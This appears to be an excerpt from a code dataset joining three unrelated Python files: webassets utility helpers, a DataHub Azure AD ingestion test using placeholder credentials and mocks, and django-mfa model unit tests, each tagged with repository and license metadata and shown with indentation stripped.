http://rosettacode.org/wiki/Find_Common_Directory_Path#Python
"""
def allnamesequal(name):
return all(n==name[0] for n in name[1:])
bydirectorylevels = zip(*[p.split(sep) for p in paths])
return sep.join(x[0] for x in takewhile(allnamesequal, bydirectorylevels))
@contextlib.contextmanager
def working_directory(directory=None, filename=None):
"""A context manager which changes the working directory to the given
path, and then changes it back to its previous value on exit.
Filters will often find this helpful.
Instead of a ``directory``, you may also give a ``filename``, and the
working directory will be set to the directory that file is in.s
"""
assert bool(directory) != bool(filename) # xor
if not directory:
directory = os.path.dirname(filename)
prev_cwd = os.getcwd()
os.chdir(directory)
try:
yield
finally:
os.chdir(prev_cwd)
def make_option_resolver(clazz=None, attribute=None, classes=None,
allow_none=True, desc=None):
"""Returns a function which can resolve an option to an object.
The option may given as an instance or a class (of ``clazz``, or
duck-typed with an attribute ``attribute``), or a string value referring
to a class as defined by the registry in ``classes``.
This support arguments, so an option may look like this:
cache:/tmp/cachedir
If this must instantiate a class, it will pass such an argument along,
if given. In addition, if the class to be instantiated has a classmethod
``make()``, this method will be used as a factory, and will be given an
Environment object (if one has been passed to the resolver). This allows
classes that need it to initialize themselves based on an Environment.
"""
assert clazz or attribute or classes
desc_string = ' to %s' % desc if desc else None
def instantiate(clazz, env, *a, **kw):
# Create an instance of clazz, via the Factory if one is defined,
# passing along the Environment, or creating the class directly.
if hasattr(clazz, 'make'):
# make() protocol is that if e.g. the get_manifest() resolver takes
# an env, then the first argument of the factory is the env.
args = (env,) + a if env is not None else a
return clazz.make(*args, **kw)
return clazz(*a, **kw)
def resolve_option(option, env=None):
the_clazz = clazz() if callable(clazz) and not isinstance(option, type) else clazz
if not option and allow_none:
return None
# If the value has one of the support attributes (duck-typing).
if attribute and hasattr(option, attribute):
if isinstance(option, type):
return instantiate(option, env)
return option
# If it is the class we support.
if the_clazz and isinstance(option, the_clazz):
return option
elif isinstance(option, type) and issubclass(option, the_clazz):
return instantiate(option, env)
# If it is a string
elif isinstance(option, six.string_types):
parts = option.split(':', 1)
key = parts[0]
arg = parts[1] if len(parts) > 1 else None
if key in classes:
return instantiate(classes[key], env, *([arg] if arg else []))
raise ValueError('%s cannot be resolved%s' % (option, desc_string))
resolve_option.__doc__ = """Resolve ``option``%s.""" % desc_string
return resolve_option
def RegistryMetaclass(clazz=None, attribute=None, allow_none=True, desc=None):
"""Returns a metaclass which will keep a registry of all subclasses, keyed
by their ``id`` attribute.
The metaclass will also have a ``resolve`` method which can turn a string
into an instance of one of the classes (based on ``make_option_resolver``).
"""
def eq(self, other):
"""Return equality with config values that instantiate this."""
return (hasattr(self, 'id') and self.id == other) or\
id(self) == id(other)
def unicode(self):
return "%s" % (self.id if hasattr(self, 'id') else repr(self))
class Metaclass(type):
REGISTRY = {}
def __new__(mcs, name, bases, attrs):
if not '__eq__' in attrs:
attrs['__eq__'] = eq
if not '__unicode__' in attrs:
attrs['__unicode__'] = unicode
if not '__str__' in attrs:
attrs['__str__'] = unicode
new_klass = type.__new__(mcs, name, bases, attrs)
if hasattr(new_klass, 'id'):
mcs.REGISTRY[new_klass.id] = new_klass
return new_klass
resolve = staticmethod(make_option_resolver(
clazz=clazz,
attribute=attribute,
allow_none=allow_none,
desc=desc,
classes=REGISTRY
))
return Metaclass
def cmp_debug_levels(level1, level2):
"""cmp() for debug levels, returns True if ``level1`` is higher
than ``level2``."""
level_ints = {False: 0, 'merge': 1, True: 2}
try:
cmp = lambda a, b: (a > b) - (a < b) # 333
return cmp(level_ints[level1], level_ints[level2])
except KeyError as e:
# Not sure if a dependency on BundleError is proper here. Validating
# debug values should probably be done on assign. But because this
# needs to happen in two places (Environment and Bundle) we do it here.
raise BundleError('Invalid debug value: %s' % e)
| 0x1997/webassets | src/webassets/utils.py | Python | bsd-2-clause | 6,584 | 0.001367 |
import json
import pathlib
from unittest.mock import patch
from freezegun import freeze_time
from datahub.ingestion.run.pipeline import Pipeline
from datahub.ingestion.source.identity.azure_ad import AzureADConfig
from tests.test_helpers import mce_helpers
FROZEN_TIME = "2021-08-24 09:00:00"
def test_azure_ad_config():
config = AzureADConfig.parse_obj(
dict(
client_id="00000000-0000-0000-0000-000000000000",
tenant_id="00000000-0000-0000-0000-000000000000",
client_secret="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
redirect="https://login.microsoftonline.com/common/oauth2/nativeclient",
authority="https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
token_url="https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
graph_url="https://graph.microsoft.com/v1.0",
ingest_users=True,
ingest_groups=True,
ingest_group_membership=True,
)
)
# Sanity on required configurations
assert config.client_id == "00000000-0000-0000-0000-000000000000"
assert config.tenant_id == "00000000-0000-0000-0000-000000000000"
assert config.client_secret == "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
assert (
config.redirect
== "https://login.microsoftonline.com/common/oauth2/nativeclient"
)
assert (
config.authority
== "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000"
)
assert (
config.token_url
== "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token"
)
assert config.graph_url == "https://graph.microsoft.com/v1.0"
# assert on defaults
assert config.ingest_users
assert config.ingest_groups
assert config.ingest_group_membership
@freeze_time(FROZEN_TIME)
def test_azure_ad_source_default_configs(pytestconfig, tmp_path):
test_resources_dir: pathlib.Path = (
pytestconfig.rootpath / "tests/integration/azure_ad"
)
with patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource.get_token"
) as mock_token, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_users"
) as mock_users, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_groups"
) as mock_groups, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_group_users"
) as mock_group_users:
mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_group_users
)
# Run an azure usage ingestion run.
pipeline = Pipeline.create(
{
"run_id": "test-azure-ad",
"source": {
"type": "azure-ad",
"config": {
"client_id": "00000000-0000-0000-0000-000000000000",
"tenant_id": "00000000-0000-0000-0000-000000000000",
"client_secret": "client_secret",
"redirect": "https://login.microsoftonline.com/common/oauth2/nativeclient",
"authority": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
"token_url": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
"graph_url": "https://graph.microsoft.com/v1.0",
"ingest_group_membership": True,
"ingest_groups": True,
"ingest_users": True,
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/azure_ad_mces_default_config.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "azure_ad_mces_default_config.json",
golden_path=test_resources_dir / "azure_ad_mces_golden_default_config.json",
)
@freeze_time(FROZEN_TIME)
def test_azure_source_ingestion_disabled(pytestconfig, tmp_path):
test_resources_dir: pathlib.Path = (
pytestconfig.rootpath / "tests/integration/azure_ad"
)
with patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource.get_token"
) as mock_token, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_users"
) as mock_users, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_groups"
) as mock_groups, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_group_users"
) as mock_group_users:
mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_group_users
)
# Run an Azure usage ingestion run.
pipeline = Pipeline.create(
{
"run_id": "test-azure-ad",
"source": {
"type": "azure-ad",
"config": {
"client_id": "00000000-0000-0000-0000-000000000000",
"tenant_id": "00000000-0000-0000-0000-000000000000",
"client_secret": "client_secret",
"redirect": "https://login.microsoftonline.com/common/oauth2/nativeclient",
"authority": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
"token_url": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
"graph_url": "https://graph.microsoft.com/v1.0",
"ingest_group_membership": "False",
"ingest_groups": "False",
"ingest_users": "False",
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/azure_ad_mces_ingestion_disabled.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "azure_ad_mces_ingestion_disabled.json",
golden_path=test_resources_dir / "azure_ad_mces_golden_ingestion_disabled.json",
)
def load_test_resources(test_resources_dir):
azure_ad_users_json_file = test_resources_dir / "azure_ad_users.json"
azure_ad_groups_json_file = test_resources_dir / "azure_ad_groups.json"
with azure_ad_users_json_file.open() as azure_ad_users_json:
reference_users = json.loads(azure_ad_users_json.read())
with azure_ad_groups_json_file.open() as azure_ad_groups_json:
reference_groups = json.loads(azure_ad_groups_json.read())
return reference_users, reference_groups
def mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_groups_users
):
# mock token response
mock_token.return_value = "xxxxxxxx"
# mock users and groups response
users, groups = load_test_resources(test_resources_dir)
mock_users.return_value = iter(list([users]))
mock_groups.return_value = iter(list([groups]))
# For simplicity, each user is placed in ALL groups.
# Create a separate response mock for each group in our sample data.
mock_groups_users.return_value = [users]
# r = []
# for _ in groups:
# r.append(users)
# mock_groups_users.return_value = iter(r)
| linkedin/WhereHows | metadata-ingestion/tests/integration/azure_ad/test_azure_ad.py | Python | apache-2.0 | 7,798 | 0.002949 |
from django_mfa.models import *
from django.test import TestCase, Client
from django.contrib.auth.models import User
from django.contrib import auth
class Test_Models_Mfa_U2f(TestCase):
def setUp(self):
self.client = Client()
self.user = User.objects.create_user(
username='djangomfa@mp.com', email='djangomfa@mp.com', password='djangomfa')
self.userotp = UserOTP.objects.create(
otp_type='TOTP', user=self.user, secret_key='secret_key')
self.user_codes = UserRecoveryCodes.objects.create(user=UserOTP.objects.get(
user=self.user), secret_code="secret_code")
self.u2f_keys = self.user.u2f_keys.create(
public_key='publicKey',
key_handle='keyHandle',
app_id='https://appId',
)
self.client.login(username='djangomfa@mp.com', password="djangomfa")
def test_mfa_enabled(self):
self.assertTrue(is_mfa_enabled(auth.get_user(self.client)))
def test_u2f_enabled(self):
self.assertTrue(is_u2f_enabled(auth.get_user(self.client)))
def test_user_data_saved_correctly(self):
user_details = auth.get_user(self.client)
self.assertEqual(self.user.username, user_details.username)
self.assertEqual(self.user.email, user_details.email)
self.assertEqual(self.user.password, user_details.password)
def test_userotp_data_saved_correctly(self):
user_otp = UserOTP.objects.filter(
user=auth.get_user(self.client)).first()
self.assertEqual(self.userotp.otp_type, user_otp.otp_type)
self.assertEqual(self.userotp.user, user_otp.user)
self.assertEqual(self.userotp.secret_key, user_otp.secret_key)
def test_u2f_key_user(self):
user_u2f = U2FKey.objects.filter(
user=auth.get_user(self.client)).first()
self.assertEqual(self.u2f_keys.user, user_u2f.user)
self.assertEqual(self.u2f_keys.public_key, user_u2f.public_key)
self.assertEqual(self.u2f_keys.key_handle, user_u2f.key_handle)
self.assertEqual(self.u2f_keys.app_id, user_u2f.app_id)
def test_u2f_to_json_function(self):
user_u2f = U2FKey.objects.filter(
user=auth.get_user(self.client)).first()
self.assertEqual(self.u2f_keys.to_json(), user_u2f.to_json())
def test_recovery_codes_generated(self):
user_codes = UserRecoveryCodes.objects.filter(user=UserOTP.objects.filter(
user=auth.get_user(self.client)).first()).first()
self.assertEqual(self.user_codes, user_codes)
| MicroPyramid/django-mfa | django_mfa/tests/test_models.py | Python | mit | 2,572 | 0.001166 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.